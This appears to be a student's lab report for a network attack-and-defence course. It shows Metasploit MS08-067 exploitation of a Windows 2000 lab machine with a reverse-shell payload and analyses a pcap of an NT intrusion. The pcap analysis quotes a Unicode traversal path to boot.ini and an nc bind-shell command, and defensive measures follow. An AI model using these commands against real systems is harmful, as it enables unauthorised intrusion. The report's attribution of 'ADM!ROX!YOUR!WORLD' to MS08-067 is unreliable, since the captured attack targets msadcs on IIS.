20253919 2025-2026-2 《网络攻防实践》第6周作业
一、实践内容
- 实践Metasploit windows attacker
Metasploit(简称 MSF)是全球最主流、最强大的开源渗透测试框架,由安全公司 Rapid7 维护,用于合法地发现、验证和利用系统漏洞,是网络安全从业者的必备工具。 - 解码NT系统破解攻击
NT系统指基于 Windows NT 内核的系统,主要包括 Windows NT 4.0、2000、XP、Server 2003,普遍存在大量未修复高危漏洞,是渗透学习经典靶机。
MS08-067(NetAPI 漏洞),通过 445 端口 SMB 服务远程代码执行,可直接获取 SYSTEM 权限。
基本步骤
- 启动 msfconsole
- 加载模块 use exploit/windows/smb/ms08_067_netapi
- 设置目标 IP set RHOSTS 靶机IP
- 设置监听 IP set LHOST 攻击机IP
- 运行攻击 run/exploit
- 在前两个任务基础上,进行演练
二、实践过程
动手实践Metasploit windows attacker:使用metasploit软件进行windows远程渗透统计实验
- 输入指令:msfconsole
![image]()
- 搜索漏洞search ms08_067
![image]()
- 进入漏洞工作台:use windows/smb/ms08_067_netapi
![image]()
- 显示配置 show options,可以看到当前无配置参数
![image]()
- 显示漏洞载荷show payloads
![image]()
- 进行配置:
输入命令 set payload generic/shell_reverse_tcp 设置载荷。
输入命令 set RHOST 192.168.200.9 设置win2k地址
输入命令 set LHOST 192.168.200.13 设置kali地址
![image]()
7.再次查看配置,发现已更改成功
![image]()
- 输入exploit发动攻击,可以看到攻击成功
![image]()
解码一次成功的NT系统破解攻击
- 改一下源文件的后缀名为pcap,并用wireshark打开
![image]()
- 使用ip.addr == 213.116.251.162 && ip.addr == 172.16.1.106进行过滤
![image]()
- 在117HTTP数据包中发现特殊字符%C0%AF
% C0% AF 是Unicode 编码的特殊字符,本质是/(路径分隔符)的 Unicode 双字节编码绕过形式。早期 IIS(Windows NT/2000/XP)存在Unicode 解码漏洞,服务器会自动将 % C0% AF 解码为/,攻击者用它替换正常路径分隔符,绕过目录访问限制,构造/..%c0%af/boot.ini等恶意路径,非法读取系统关键文件 boot.ini,这种利用 Unicode 编码绕过权限验证的攻击就是Unicode 目录遍历攻击。
![image]()
- 在140数据包中发现攻击者想要获得msadcs.dll文件
![image]()
- 在追踪到149数据包时,发现ADM!ROX!YOUR!WORLD
这是MS08-067 漏洞利用成功时的标志性特征字符串,是该漏洞利用代码中自带的标识信息。当 Metasploit 等工具成功利用 MS08-067 远程溢出漏洞时,会出现该字符,表明已成功触发漏洞、获得目标系统控制权,常作为漏洞利用成功的判断依据。
![image]()
- 通过追踪FTP流发现攻击方试图猜密码,但失败了。继续追踪,发现他猜成功了
![image]()
![image]()
- 继续追踪发现,攻击者通过nc构建其一个远程 shell 通道,利用命令cmd1.exe /c nc -l -p 6969 -e cmd1.exe,连接 6969 了端口
![image]()
- 使用tcp.port == 6969进行过滤,并追踪TCP流
![image]()
- 发现其做了不少操作,有dir、del、type、net users、echo等等
![image]()
- 在后续追踪可以发现攻击方已经发现了攻击的蜜罐主机,并留言
![image]()
防范 MS08-067 漏洞攻击
- 及时安装微软官方发布的 MS08-067 安全补丁,从根源修复漏洞。
- 关闭不必要的 SMB 服务,禁止 445 端口对外开放,减少攻击面。
- 使用防火墙策略限制外部对 139、445 等高危端口的访问。
- 停用或限制匿名访问共享、IPC$ 连接,降低被利用风险。
- 及时更新系统,对老旧 Windows 系统(XP/2003)进行升级或下线处理。
- 部署入侵检测 / 防御设备,监控针对 445 端口的异常攻击行为。
防范 Unicode 目录遍历攻击
- 统一解码与规范化
先对用户输入完整 URL 解码、Unicode 解码并标准化,避免超长编码、多字节编码绕过。 - 禁止黑名单过滤,使用白名单校验
仅允许合法字符,拒绝包含 ../、\、/ 等路径跳转字符的输入。 - 严格限制访问路径
将用户可访问文件限定在指定目录内,通过拼接绝对路径并校验前缀,防止越权访问。 - 使用安全文件接口
优先使用语言 / 框架提供的安全路径处理函数,避免手动拼接路径。 - 最小权限运行
服务进程仅授予必要目录权限,禁止访问系统敏感路径。
攻方使用metasploit选择漏洞进行攻击,获得控制权
攻击方的同学信息、使用漏洞、相关IP地址
攻方信息:kali机,MS08-067漏洞,ip:192.168.200.13
步骤与任务1相同,这里获取权限后,创建文件夹leijiao,进行模拟攻击操作

可以看到成功在被攻击方主机中创建了文件夹

防守方使用wireshark监听获得的网络数据包,分析攻击过程,获取相关信息。
能够在TCP流中,找到攻击方的操作

三、遇到问题
- 问题1:无法控制win2k
- 问题1解决方案:要设置在同一网关下才行
四、实践总结
通过学习 Metasploit 攻击 NT 系统相关内容,我掌握了以 MS08-067 为代表的经典漏洞利用方法与 Metasploit 基础操作流程,熟悉了从漏洞利用、获取 Meterpreter Shell 到提权、导出密码哈希、后渗透的完整攻击链路,理解了老旧 NT 系统的安全缺陷,建立起基本的攻防对抗思维,同时也明确了网络安全相关法律边界,树立了仅在授权环境下学习的安全底线,为后续深入学习内网渗透与安全防护奠定了扎实基础




















浙公网安备 33010602011771号